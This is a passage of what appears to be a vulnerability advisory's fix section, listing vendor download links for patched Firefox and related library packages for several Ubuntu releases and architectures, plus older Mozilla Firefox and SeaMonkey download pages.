target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\nUbuntu firefox-gnome-support_2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\nUbuntu firefox-libthai_2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_</a> 2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\nUbuntu firefox_2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17 target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17</a> +0nobinonly-0ubuntu0.7.4_i386.deb\r\nUbuntu libnspr-dev_1.firefox2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi</a> refox2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\nUbuntu libnspr4_1.firefox2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef</a> ox2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\nUbuntu libnss-dev_1.firefox2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir</a> efox2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\nUbuntu libnss3_1.firefox2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo</a> x2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\nUbuntu mozilla-firefox-dev_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-dev_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\nUbuntu mozilla-firefox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\nUbuntu mozilla-firefox-gnome-support_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-gnome-support_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\nUbuntu mozilla-firefox_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n \r\nMozilla Firefox 2.0.0.15\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0.0.10\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla SeaMonkey 1.1 beta\r\nMozilla SeaMonkey Download\r\n<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a>\r\nUbuntu Ubuntu Linux 7.04 amd64\r\nUbuntu firefox-dbg_2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.</a> 0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\nUbuntu firefox-dev_2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.</a> 0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\nUbuntu firefox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\nUbuntu firefox-gnome-support_2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\nUbuntu firefox-libthai_2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_</a> 2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\nUbuntu firefox_2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17 target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17</a> +0nobinonly-0ubuntu0.7.4_amd64.deb\r\nUbuntu libnspr-dev_1.firefox2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi</a> refox2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\nUbuntu libnspr4_1.firefox2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef</a> ox2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\nUbuntu libnss-dev_1.firefox2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir</a> efox2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\nUbuntu libnss3_1.firefox2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo</a> x2.0.0.17+0nobinonly-0ubuntu0.7.4_amd64.deb\r\nUbuntu mozilla-firefox-dev_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-dev_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\nUbuntu mozilla-firefox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\nUbuntu mozilla-firefox-gnome-support_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-gnome-support_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\nUbuntu mozilla-firefox_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n \r\nMozilla Firefox 2.0.0.10\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nUbuntu Ubuntu Linux 6.06 LTS powerpc\r\nUbuntu firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.</a> dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\nUbuntu firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.</a> dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\nUbuntu firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\nUbuntu firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\nUbuntu firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg</a> +1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\nUbuntu libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi</a> refox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\nUbuntu libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef</a> ox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\nUbuntu libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir</a> efox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\nUbuntu libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo</a> x1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_powerpc.deb\r\nUbuntu mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\nUbuntu mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_</a> 1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n \r\nMozilla Firefox 2.0.0.12\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0.0.11\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0.0.2\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nUbuntu Ubuntu Linux 7.10 lpia\r\nUbuntu firefox-dbg_2.0.0.17+1nobinonly-0ubuntu0.7.10_lpia.deb\r\n<a href=http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_2.0.0.17+1nobi target=_blank>http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_2.0.0.17+1nobi</a> nonly-0ubuntu0.7.10_lpia.deb\r\nUbuntu firefox-dev_2.0.0.17+1nobinonly-0ubuntu0.7.10_lpia.deb\r\n<a href=http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_2.0.0.17+1nobi target=_blank>http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_2.0.0.17+1nobi</a> nonly-0ubuntu0.7.10_lpia.deb\r\nUbuntu firefox-dom-inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\nUbuntu firefox-gnome-support_2.0.0.17+1nobinonly-0ubuntu0.7.10_lpia.deb\r\n<a href=http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_2.0. target=_blank>http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_2.0.</a> 0.17+1nobinonly-0ubuntu0.7.10_lpia.deb\r\nUbuntu firefox-libthai_2.0.0.17+1nobinonly-0ubuntu0.7.10_lpia.deb\r\n<a href=http://ports.ubuntu.com/pool/main/f/firefox/firefox-libthai_2.0.0.17+1 target=_blank>http://ports.ubuntu.com/pool/main/f/firefox/firefox-libthai_2.0.0.17+1</a> nobinonly-0ubuntu0.7.10_lpia.deb\r\nUbuntu firefox_2.0.0.17+1nobinonly-0ubuntu0.7.10_lpia.deb\r\n<a href=http://ports.ubuntu.com/pool/main/f/firefox/firefox_2.0.0.17+1nobinonl target=_blank>http://ports.ubuntu.com/pool/main/f/firefox/firefox_2.0.0.17+1nobinonl</a> y-0ubuntu0.7.10_lpia.deb\r\n \r\nUbuntu Ubuntu Linux 6.06 LTS i386\r\nUbuntu firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.</a> dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\nUbuntu firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.</a> dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\nUbuntu firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\nUbuntu firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\nUbuntu firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg</a> +1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\nUbuntu libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi</a> refox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\nUbuntu libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef</a> ox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\nUbuntu libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir</a> efox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\nUbuntu libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo</a> x1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_i386.deb\r\nUbuntu mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\nUbuntu mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_</a> 1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n \r\nUbuntu Ubuntu Linux 7.10 i386\r\nUbuntu firefox-dbg_2.0.0.17+1nobinonly-0ubuntu0.7.10_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.</a> 0.17+1nobinonly-0ubuntu0.7.10_i386.deb\r\nUbuntu firefox-dev_2.0.0.17+1nobinonly-0ubuntu0.7.10_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.</a> 0.17+1nobinonly-0ubuntu0.7.10_i386.deb\r\nUbuntu firefox-dom-inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\nUbuntu firefox-gnome-support_2.0.0.17+1nobinonly-0ubuntu0.7.10_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_2.0.0.17+1nobinonly-0ubuntu0.7.10_i386.deb\r\nUbuntu firefox-libthai_2.0.0.17+1nobinonly-0ubuntu0.7.10_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_</a> 2.0.0.17+1nobinonly-0ubuntu0.7.10_i386.deb\r\nUbuntu firefox_2.0.0.17+1nobinonly-0ubuntu0.7.10_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17 target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17</a> +1nobinonly-0ubuntu0.7.10_i386.deb\r\nUbuntu Ubuntu Linux 6.06 LTS amd64\r\nUbuntu firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.</a> dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\nUbuntu firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.</a> dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\nUbuntu firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\nUbuntu firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\nUbuntu firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg</a> +1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\nUbuntu libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi</a> refox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\nUbuntu libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef</a> ox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\nUbuntu libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir</a> efox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\nUbuntu libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo</a> x1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb\r\nUbuntu mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\nUbuntu mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_</a> 1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\nUbuntu Ubuntu Linux 7.10 amd64\r\nUbuntu firefox-dbg_2.0.0.17+1nobinonly-0ubuntu0.7.10_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.</a> 0.17+1nobinonly-0ubuntu0.7.10_amd64.deb\r\nUbuntu firefox-dev_2.0.0.17+1nobinonly-0ubuntu0.7.10_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.</a> 0.17+1nobinonly-0ubuntu0.7.10_amd64.deb\r\nUbuntu firefox-dom-inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\nUbuntu firefox-gnome-support_2.0.0.17+1nobinonly-0ubuntu0.7.10_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_2.0.0.17+1nobinonly-0ubuntu0.7.10_amd64.deb\r\nUbuntu firefox-libthai_2.0.0.17+1nobinonly-0ubuntu0.7.10_amd64.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_</a> 2.0.0.17+1nobinonly-0ubuntu0.7.10_amd64.deb\r\nUbuntu firefox_2.0.0.17+1nobinonly-0ubuntu0.7.10_amd64.deb\r\n<a 